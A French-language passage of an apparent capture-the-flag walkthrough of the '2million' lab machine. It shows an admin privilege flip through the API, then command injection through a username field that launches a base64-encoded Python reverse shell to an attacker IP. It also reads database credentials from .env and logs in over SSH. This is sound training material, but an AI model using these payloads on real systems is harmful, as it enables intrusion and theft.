class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">function</span> makeInviteCode<span class="o">()</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> $.ajax<span class="o">({</span> </span></span><span class="line"><span class="cl"> type: <span class="s2">&#34;POST&#34;</span>, </span></span><span class="line"><span class="cl"> dataType: <span class="s2">&#34;json&#34;</span>, </span></span><span class="line"><span class="cl"> url: <span class="s1">&#39;/api/v1/invite/how/to/generate&#39;</span>, </span></span><span class="line"><span class="cl"> success: <span class="k">function</span> <span class="o">(</span>response<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> console.log<span class="o">(</span>response<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> error: <span class="k">function</span> <span class="o">(</span>response<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> console.log<span class="o">(</span>response<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">})</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On effectue donc cette requete :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /api/v1/invite/how/to/generate HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 2million.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:109.0<span class="o">)</span> Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*<span class="p">;</span> <span class="nv">q</span><span class="o">=</span>0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">kvl37ft06haubd9f1davp7407bq</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Content-Length: <span class="m">17</span> </span></span><span class="line"><span class="cl">Origin: http://2million.htb </span></span><span class="line"><span class="cl">Connection: close </span></span><span class="line"><span class="cl">Referer: http://2million.htb/invite </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>kvl37ft06haubd9f1davp7407b </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">code</span><span class="o">=</span>&lt;b&gt;qsdqs&lt;/b&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Server: nginx </span></span><span class="line"><span class="cl">Date: Fri, <span class="m">06</span> Dec <span class="m">2024</span> 23:44:09 GMT </span></span><span class="line"><span class="cl">Content-Type: application/json </span></span><span class="line"><span class="cl">Connection: close </span></span><span class="line"><span class="cl">Expires: Thu, <span class="m">19</span> Nov <span class="m">1981</span> 08:52:00 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-store, no-cache, must-revalidate </span></span><span class="line"><span class="cl">Pragma: no-cache </span></span><span class="line"><span class="cl">Content-Length: <span class="m">249</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;0&#34;</span>:200,<span class="s2">&#34;success&#34;</span>:1,<span class="s2">&#34;data&#34;</span>:<span class="o">{</span><span class="s2">&#34;data&#34;</span>:<span class="s2">&#34;Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr&#34;</span>,<span class="s2">&#34;enctype&#34;</span>:<span class="s2">&#34;ROT13&#34;</span><span class="o">}</span>,<span class="s2">&#34;hint&#34;</span>:<span class="s2">&#34;Data is encrypted ... We should probbably check the encryption type in order to decrypt it...&#34;</span><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On y découvre un code chiffré à l&rsquo;aide de ROT13. Grace au site internet <code>dcode.fr</code> on déchiffre le message suivant :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">In order to generate the invite code, make a POST request to <span class="se">\/</span>api<span class="se">\/</span>v1<span class="se">\/</span>invite<span class="se">\/</span>generate </span></span></code></pre></td></tr></table> </div> </div><p>On effectue donc cette requête POST sur Burp:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /api/v1/invite/generate HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 2million.htb </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>Windows NT 10.0<span class="p">;</span> Win64<span class="p">;</span> x64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/125.0.6422.60 Safari/537.36 </span></span><span class="line"><span class="cl">Connection: close </span></span><span class="line"><span class="cl">Cache-Control: max-age<span class="o">=</span><span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>Réponse:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Server: nginx </span></span><span class="line"><span class="cl">Date: Sat, <span class="m">07</span> Dec <span class="m">2024</span> 21:25:53 GMT </span></span><span class="line"><span class="cl">Content-Type: application/json </span></span><span class="line"><span class="cl">Connection: close </span></span><span class="line"><span class="cl">Set-Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>nvi1ir085vrvc1cuqq22gjoaot<span class="p">;</span> <span class="nv">path</span><span class="o">=</span>/ </span></span><span class="line"><span class="cl">Expires: Thu, <span class="m">19</span> Nov <span class="m">1981</span> 08:52:00 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-store, no-cache, must-revalidate </span></span><span class="line"><span class="cl">Pragma: no-cache </span></span><span class="line"><span class="cl">Content-Length: <span class="m">91</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;0&#34;</span>:200,<span class="s2">&#34;success&#34;</span>:1,<span class="s2">&#34;data&#34;</span>:<span class="o">{</span><span class="s2">&#34;code&#34;</span>:<span class="s2">&#34;SFE2OVUtMzE1Rk4tUTBUNU0tQko0NU8=&#34;</span>,<span class="s2">&#34;format&#34;</span>:<span class="s2">&#34;encoded&#34;</span><span class="o">}}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On nous envoie le code en base64, ce qui nous donne:</p> <blockquote> <p>HQ69U-315FN-Q0T5M-BJ45O</p> </blockquote> <p>On importe la fonction verifyInviteCode dans la console de firefox qui nous indique que le code est correct</p> <p>On se rend sur la page <code>2million.htb/invite</code> On s&rsquo;inscrit avec un compte -&gt; <a class="link" href="mailto:hello@hello.hello" >hello@hello.hello</a> : hello</p> <h3 id="admin">admin </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /api/v1 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 2million.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:133.0<span class="o">)</span> Gecko/20100101 Firefox/133.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://2million.htb/home/access </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>dn1g3q7kgl2jj3ondr1sda9gm9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Server: nginx </span></span><span class="line"><span class="cl">Date: Sat, <span class="m">07</span> Dec <span class="m">2024</span> 22:51:47 GMT </span></span><span class="line"><span class="cl">Content-Type: application/json </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Expires: Thu, <span class="m">19</span> Nov <span class="m">1981</span> 08:52:00 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-store, no-cache, must-revalidate </span></span><span class="line"><span class="cl">Pragma: no-cache </span></span><span class="line"><span class="cl">Content-Length: <span class="m">800</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;v1&#34;</span>:<span class="o">{</span><span class="s2">&#34;user&#34;</span>:<span class="o">{</span><span class="s2">&#34;GET&#34;</span>:<span class="o">{</span><span class="s2">&#34;\/api\/v1&#34;</span>:<span class="s2">&#34;Route List&#34;</span>,<span class="s2">&#34;\/api\/v1\/invite\/how\/to\/generate&#34;</span>:<span class="s2">&#34;Instructions on invite code generation&#34;</span>,<span class="s2">&#34;\/api\/v1\/invite\/generate&#34;</span>:<span class="s2">&#34;Generate invite code&#34;</span>,<span class="s2">&#34;\/api\/v1\/invite\/verify&#34;</span>:<span class="s2">&#34;Verify invite code&#34;</span>,<span class="s2">&#34;\/api\/v1\/user\/auth&#34;</span>:<span class="s2">&#34;Check if user is authenticated&#34;</span>,<span class="s2">&#34;\/api\/v1\/user\/vpn\/generate&#34;</span>:<span class="s2">&#34;Generate a new VPN configuration&#34;</span>,<span class="s2">&#34;\/api\/v1\/user\/vpn\/regenerate&#34;</span>:<span class="s2">&#34;Regenerate VPN configuration&#34;</span>,<span class="s2">&#34;\/api\/v1\/user\/vpn\/download&#34;</span>:<span class="s2">&#34;Download OVPN file&#34;</span><span class="o">}</span>,<span class="s2">&#34;POST&#34;</span>:<span class="o">{</span><span class="s2">&#34;\/api\/v1\/user\/register&#34;</span>:<span class="s2">&#34;Register a new user&#34;</span>,<span class="s2">&#34;\/api\/v1\/user\/login&#34;</span>:<span class="s2">&#34;Login with existing user&#34;</span><span class="o">}}</span>,<span class="s2">&#34;admin&#34;</span>:<span class="o">{</span><span class="s2">&#34;GET&#34;</span>:<span class="o">{</span><span class="s2">&#34;\/api\/v1\/admin\/auth&#34;</span>:<span class="s2">&#34;Check if user is admin&#34;</span><span class="o">}</span>,<span class="s2">&#34;POST&#34;</span>:<span class="o">{</span><span class="s2">&#34;\/api\/v1\/admin\/vpn\/generate&#34;</span>:<span class="s2">&#34;Generate VPN for specific user&#34;</span><span class="o">}</span>,<span class="s2">&#34;PUT&#34;</span>:<span class="o">{</span><span class="s2">&#34;\/api\/v1\/admin\/settings\/update&#34;</span>:<span class="s2">&#34;Update user settings&#34;</span><span class="o">}}}}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On envoie cette requete:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PUT /api/v1/admin/settings/update HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 2million.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:133.0<span class="o">)</span> Gecko/20100101 Firefox/133.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/json </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://2million.htb/home/access </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>jg018kgbajmc0pjtrdo4dv603a </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl">Content-Length: <span class="m">52</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"><span class="s2">&#34;email&#34;</span> : <span class="s2">&#34;hello@hello.hello&#34;</span>, </span></span><span class="line"><span class="cl"><span class="s2">&#34;is_admin&#34;</span> : <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># REPONSE</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Server: nginx </span></span><span class="line"><span class="cl">Date: Sat, <span class="m">07</span> Dec <span class="m">2024</span> 23:59:01 GMT </span></span><span class="line"><span class="cl">Content-Type: application/json </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Expires: Thu, <span class="m">19</span> Nov <span class="m">1981</span> 08:52:00 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-store, no-cache, must-revalidate </span></span><span class="line"><span class="cl">Pragma: no-cache </span></span><span class="line"><span class="cl">Content-Length: <span class="m">41</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;id&#34;</span>:22,<span class="s2">&#34;username&#34;</span>:<span class="s2">&#34;hello&#34;</span>,<span class="s2">&#34;is_admin&#34;</span>:1<span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On peut demander a générer un vpn pour un utilisateur. L&rsquo;utilisateur est injectable, comme on peut voir avec la commande curl ici.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -X POST http://2million.htb/api/v1/admin/vpn/generate <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Host: 2million.htb&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept-Encoding: gzip, deflate, br&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Connection: keep-alive&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Referer: http://2million.htb/home/access&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Upgrade-Insecure-Requests: 1&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">--data <span class="s1">&#39;{&#34;username&#34;:&#34;admin;whoami;&#34;}&#39;</span> </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h3 id="reverse-shell--www-data">Reverse Shell : www-data </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -X POST http://2million.htb/api/v1/admin/vpn/generate <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Host: 2million.htb&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Accept-Encoding: gzip, deflate, br&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Connection: keep-alive&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Referer: http://2million.htb/home/access&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">-H <span class="s2">&#34;Upgrade-Insecure-Requests: 1&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl">--data <span class="s1">&#39;{&#34;username&#34;:&#34;admin;echo ZXhwb3J0IFJIT1NUPSIxMC4xMC4xNi41NSI7ZXhwb3J0IFJQT1JUPTkwMDE7cHl0aG9uMyAtYyAnaW1wb3J0IHN5cyxzb2NrZXQsb3MscHR5O3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgob3MuZ2V0ZW52KCJSSE9TVCIpLGludChvcy5nZXRlbnYoIlJQT1JUIikpKSk7W29zLmR1cDIocy5maWxlbm8oKSxmZCkgZm9yIGZkIGluICgwLDEsMildO3B0eS5zcGF3bigic2giKSc= | base64 -d | sh;&#34;}&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---admin">www-data -&gt; admin </h2><h3 id="env-file--admin-credentials">.env file : admin credentials </h3><p>En observant les fichiers du site web depuis <strong>www-data</strong> on observe le fichier **index.php **qui semble recupérer des credentials depuis le fichier <code>.env</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$envFile</span> <span class="o">=</span> file<span class="o">(</span><span class="s1">&#39;.env&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$envVariables</span> <span class="o">=</span> <span class="o">[]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">foreach <span class="o">(</span><span class="nv">$envFile</span> as <span class="nv">$line</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$line</span> <span class="o">=</span> trim<span class="o">(</span><span class="nv">$line</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span>!empty<span class="o">(</span><span class="nv">$line</span><span class="o">)</span> <span class="o">&amp;&amp;</span> strpos<span class="o">(</span><span class="nv">$line</span>, <span class="s1">&#39;=&#39;</span><span class="o">)</span> !<span class="o">==</span> <span class="nb">false</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> list<span class="o">(</span><span class="nv">$key</span>, <span class="nv">$value</span><span class="o">)</span> <span class="o">=</span> explode<span class="o">(</span><span class="s1">&#39;=&#39;</span>, <span class="nv">$line</span>, 2<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$key</span> <span class="o">=</span> trim<span class="o">(</span><span class="nv">$key</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$value</span> <span class="o">=</span> trim<span class="o">(</span><span class="nv">$value</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$envVariables</span><span class="o">[</span><span class="nv">$key</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$dbHost</span> <span class="o">=</span> <span class="nv">$envVariables</span><span class="o">[</span><span class="s1">&#39;DB_HOST&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbName</span> <span class="o">=</span> <span class="nv">$envVariables</span><span class="o">[</span><span class="s1">&#39;DB_DATABASE&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbUser</span> <span class="o">=</span> <span class="nv">$envVariables</span><span class="o">[</span><span class="s1">&#39;DB_USERNAME&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbPass</span> <span class="o">=</span> <span class="nv">$envVariables</span><span class="o">[</span><span class="s1">&#39;DB_PASSWORD&#39;</span><span class="o">]</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>En affichant <code>.env</code>, on trouve les credentials admin:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat .env </span></span><span class="line"><span class="cl"><span class="nv">DB_HOST</span><span class="o">=</span>127.0.0.1 </span></span><span class="line"><span class="cl"><span class="nv">DB_DATABASE</span><span class="o">=</span>htb_prod </span></span><span class="line"><span class="cl"><span class="nv">DB_USERNAME</span><span class="o">=</span>admin </span></span><span class="line"><span class="cl"><span class="nv">DB_PASSWORD</span><span class="o">=</span>SuperDuperPass123 </span></span></code></pre></td></tr></table> </div> </div><p>On se connecte en ssh a l&rsquo;utilisateur <code>admin</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh admin@2million.htb </span></span><span class="line"><span class="cl">admin@2million:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">admin@2million:~$ cat user.txt </span></span><span class="line"><span class="cl">1489.....d42e </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mails--varmailadmin">Mails : /var/mail/admin </h3><p>Avec <strong>linpeas</strong>, on observe que admin a des mails à lire dans <strong>/var/mail/admin</strong>. Ce mail indique qu&rsquo;une vulnérabilité du kernel linux &ldquo;OverlayFS / FUSE&rdquo; semble exploitable.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 